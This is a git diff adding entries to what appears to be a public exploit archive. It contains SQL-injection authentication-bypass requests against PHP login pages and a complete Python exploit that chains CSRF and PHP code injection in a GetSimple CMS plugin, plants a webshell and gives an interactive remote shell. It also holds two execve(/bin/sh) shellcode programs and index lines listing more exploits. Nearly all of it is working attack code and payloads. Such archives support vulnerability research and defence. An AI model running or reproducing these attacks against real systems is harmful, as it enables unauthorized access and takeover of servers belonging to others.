+# Software Link: https://www.sourcecodester.com/download-code?nid=11400&title=Simple+Student+Information+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: windows 10
+
+POC
+
+Step 1 - Go to url http://localhost/studentinfosystem/index.php
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in burpsuite
+Step 4 – Change the username to 'or''=' and password 'or''='
+Step 5 – after entering the payload, you can enter the website
+
+
+POST /studentinfosystem/index.php HTTP/1.1
+Host: 192.168.1.14
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+Origin: http://192.168.1.14
+Connection: close
+Referer: http://192.168.1.14/studentinfosystem/index.php
+Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
+Upgrade-Insecure-Requests: 1
+
+username='or''='&password='or''='&login=Log+In
\ No newline at end of file
diff --git a/exploits/php/webapps/49761.txt b/exploits/php/webapps/49761.txt
new file mode 100644
index 000000000..1d4320f68
--- /dev/null
+++ b/exploits/php/webapps/49761.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
+# Date: 13 April 2021
+# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
+# Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/
+# Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2
+
+I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login)
+*Police Login page*
+
+POST /digital-cyber-crime-report/policelogin.php HTTP/1.1
+Host: 192.168.1.14
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+Origin: http://192.168.1.14
+Connection: close
+Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php
+Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
+Upgrade-Insecure-Requests: 1
+
+email='or''='&password='or''='&s=
+
+*Incharge Login*
+POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1
+Host: 192.168.1.14
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+Origin: http://192.168.1.14
+Connection: close
+Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php
+Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
+Upgrade-Insecure-Requests: 1
+
+email='or''='&password='or''='&s=
+
+*User Login*
+POST /digital-cyber-crime-report/userlogin.php HTTP/1.1
+Host: 192.168.1.14
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Origin: http://192.168.1.14
+Connection: close
+Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php
+Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
+Upgrade-Insecure-Requests: 1
+
+email=imanakbar1000%40gmail.com&password='or''='&s=
+
+*HQ Login*
+POST /digital-cyber-crime-report/headlogin.php HTTP/1.1
+Host: 192.168.1.14
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Origin: http://192.168.1.14
+Connection: close
+Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php
+Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
+Upgrade-Insecure-Requests: 1
+
+email=imanakbar1000%40gmail.com&password='or''='&s=
\ No newline at end of file
diff --git a/exploits/php/webapps/49774.py b/exploits/php/webapps/49774.py
new file mode 100755
index 000000000..e765d8f01
--- /dev/null
+++ b/exploits/php/webapps/49774.py
@@ -0,0 +1,158 @@
+# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Date: 15/04/2021
+# Vendor Homepage: http://get-simple.info 
+# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
+# Vendor: NetExplorer
+# Version: <= v1.1.1
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox
+# About My SMTP Contact Plugin:
+#   An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
+# CSRF Vulnerability Information:
+#   The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the  My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
+# PHP Code Injection Vulnerability Information:
+#   When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation.
+# Exploit Description:
+#   The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
+# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+# CVSS Base Score: 9.6
+
+import argparse,requests
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from colorama import (Fore as F, Back as B, Style as S)
+from threading import Thread
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+    C=FB if color == 'B' else FR if color == 'R' else FG
+    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
+
+class theTHREADER(object):
+    def __init__(self, interval=1):
+        self.interval = interval
+        thread = Thread(target=self.run, args=())
+        thread.daemon = True
+        thread.start()
+    def run(self):
+        run()
+
+def webshell(target):
+    try:
+        websh = "{}/webshell.php".format(target)
+        term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
+        author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
+        print(author)
+        while True:
+            specialmove = input(term)
+            command = {'FierceGodKick': specialmove}
+            r = requests.post(websh, data=command, verify=False)
+            status = r.status_code
+            if status != 200:
+                r.raise_for_status()
+            response = r.text
+            print(response)
+    except:
+        pass
+
+def generateCsrfPayload():
+    payload  = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
+    payload += '<input type="hidden" name="act" value="addsettings">'
+    payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
+    payload += '<input type="hidden" name="m_smtp_c_email_to" value="boku@0xboku">'
+    payload += '<input type="hidden" name="m_smtp_c_smtp_or_standard" value="standard">'
+    payload += '<input type="hidden" name="m_smtp_c_digital_captcha" value="on">'
+    payload += '<input type="hidden" name="m_smtp_c_digitSalt" value="TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR">'
+    payload += '<input type="hidden" name="m_smtp_c_agree_checkbox" value="on">'
+    payload += '<input type="hidden" name="m_smtp_c_client_server" value="client_server">'
+    payload += '<input type="hidden" name="m_smtp_c_window_msg" value="on">'
+    payload += '<input type="hidden" name="m_smtp_c_default_css" value="on">'
+    payload += '<input type="hidden" name="m_smtp_c_sender_name" value="boku">'
+    payload += '<input type="hidden" name="m_smtp_c_subject" value="RCE">'
+    payload += '<input type="hidden" name="m_smtp_c_email_from" value="boku@0xboku">'
+    payload += '<input type="hidden" name="m_smtp_c_email_from_password" value="password123">'
+    payload += '<input type="hidden" name="m_smtp_c_email_from_ssl" value="ssl://smtp.0xboku">'
+    payload += '<input type="hidden" name="m_smtp_c_email_from_port" value="777">'
+    payload += '<input type="hidden" name="m_smtp_c_standard_email_from" value="boku@0xboku">'
+    payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="62605e65e25ab30">'
+    payload += '<input type="hidden" name="my_smtp_c_selected_name" value="asd">'
+    payload += '<input type="hidden" name="m_smtp_c_alternative_fields" value="off">'
+    payload += '<input type="hidden" name="m_smtp_c_qty_fields" value="1">'
+    payload += '<input type="hidden" name="m_smtp_c_limit_file_size" value="1">'
+    payload += '<input type="hidden" name="m_smtp_c_valid_file_format" value="jpeg">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name[]" value="User name">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name_ok[]" value="ok">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_tags_Name[]" value="0">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Required[]" value="required">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Type[]" value="text">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Maxlength[]" value="50">'
+    payload += '<input type="hidden" name="m_smtp_c_arr_fields_Code[]" value="{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}">'
+    payload += '<input type="submit" value="Submit request">'
+    payload += '</form><body>'
+    return payload
+
+class S(BaseHTTPRequestHandler):
+    def do_GET(self):
+        victim = self.client_address
+        victim = "{}:{}".format(victim[0],victim[1])
+        print("{} connected to Malicious CSRF Site!".format(victim))
+        self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8'))
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+    server_address = ('', port)
+    httpd = server_class(server_address, handler_class)
+    banner  = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST)
+    print(banner)
+    print('Listening for Victims to connect..')
+    try:
+        httpd.serve_forever()
+    except KeyboardInterrupt:
+        pass
+    httpd.server_close()
+    print('Stopping httpd...')
+
+# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
+def tryUploadWebshell(target,contact):
+    try:
+        blind = target+contact
+        # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
+        webshUpload  = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
+        requests.post(url=blind, data=webshUpload, verify=False)
+    except:
+        pass
+
+def checkWebshell(target):
+    try:
+        websh = "{}/webshell.php".format(target)
+        capsule = {'FierceGodKick':'pwnt?'}
+        resp = requests.post(url=websh, data=capsule, verify=False)
+        return resp.status_code
+    except:
+        pass
+
+def argsetup():
+    about  = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. '
+    about += FR+'CVSS Base Score: 9.6 | '
+    about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+    parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
+    args = parser.parse_args()
+    return args
+
+if __name__ == '__main__':
+    args      = argsetup()
+    target    = args.TargetSite
+    contact   = args.SMTPContactPage
+    threadshed = theTHREADER()
+    pwnt = checkWebshell(target)
+    if pwnt != 200:
+        while pwnt != 200:
+            sleep(3)
+            tryUploadWebshell(target,contact)
+            sleep(2)
+            pwnt = checkWebshell(target)
+    print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
+    webshell(target)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4dddecebe..b93baa728 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6777,6 +6777,7 @@ id,file,description,date,author,type,platform,port
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
+49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11311,6 +11312,7 @@ id,file,description,date,author,type,platform,port
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
+49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43934,3 +43936,16 @@ id,file,description,date,author,type,platform,port
 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,
 49753,exploits/php/webapps/49753.txt,"Composr 10.0.36 - Remote Code Execution",2021-04-08,"Orion Hridoy",webapps,php,
 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,
+49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,
+49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,
+49760,exploits/multiple/webapps/49760.txt,"ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow",2021-04-13,"Jai Kumar Sharma",webapps,multiple,
+49761,exploits/php/webapps/49761.txt,"Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)",2021-04-14,GaluhID,webapps,php,
+49762,exploits/java/webapps/49762.txt,"CITSmart ITSM 9.1.2.22 - LDAP Injection",2021-04-14,skysbsb,webapps,java,
+49763,exploits/java/webapps/49763.txt,"CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)",2021-04-14,skysbsb,webapps,java,
+49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware,
+49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
+49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
+49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",2021-04-15,nu11secur1ty,webapps,multiple,
+49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple,
+49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,
+49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE",2021-04-16,boku,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 7bafdcd84..32307fc3b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1032,3 +1032,5 @@ id,file,description,date,author,type,platform
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
 49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
+49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
+49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/49770.c b/shellcodes/linux_x86-64/49770.c
new file mode 100644
index 000000000..a366533b3
--- /dev/null
+++ b/shellcodes/linux_x86-64/49770.c
@@ -0,0 +1,46 @@
+# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
+# Author: s1ege
+# Tested on: x86_64 GNU/Linux
+# Shellcode Length: 21
+
+/*
+
+################################################
+objdump disassembly
+################################################
+401000: 50 push %rax
+401001: 48 31 d2 xor %rdx,%rdx
+401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
+40100b: 2f 73 68
+40100e: 53 push %rbx
+40100f: 54 push %rsp
+401010: 5f pop %rdi
+401011: b0 3b mov $0x3b,%al
+401013: 0f 05 syscall
+################################################
+
+################################################
+shellcode.asm
+################################################
+; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push rax
+xor rdx, rdx
+mov rbx, 0x68732f2f6e69622f
+push rbx
+push rsp
+pop rdi
+mov al, 59
+syscall
+################################################
+*/
+unsigned char shellcode[] = \
+"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
+
+int main() {
+int (*ret)() = (int(*)())shellcode;
+ret();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/49768.c b/shellcodes/linux_x86/49768.c
new file mode 100644
index 000000000..7ddc7df3c
--- /dev/null
+++ b/shellcodes/linux_x86/49768.c
@@ -0,0 +1,30 @@
+# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
+# Author: s1ege
+# Tested on: i686 GNU/Linux
+# Shellcode length: 17
+
+/*
+; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push 0x0b
+pop eax
+push 0x0068732f
+push 0x6e69622f
+mov ebx, esp
+int 0x80
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+int main() {
+printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
+int (*ret)() = (int(*)())code;
+ret();
+return 0;
+}
\ No newline at end of file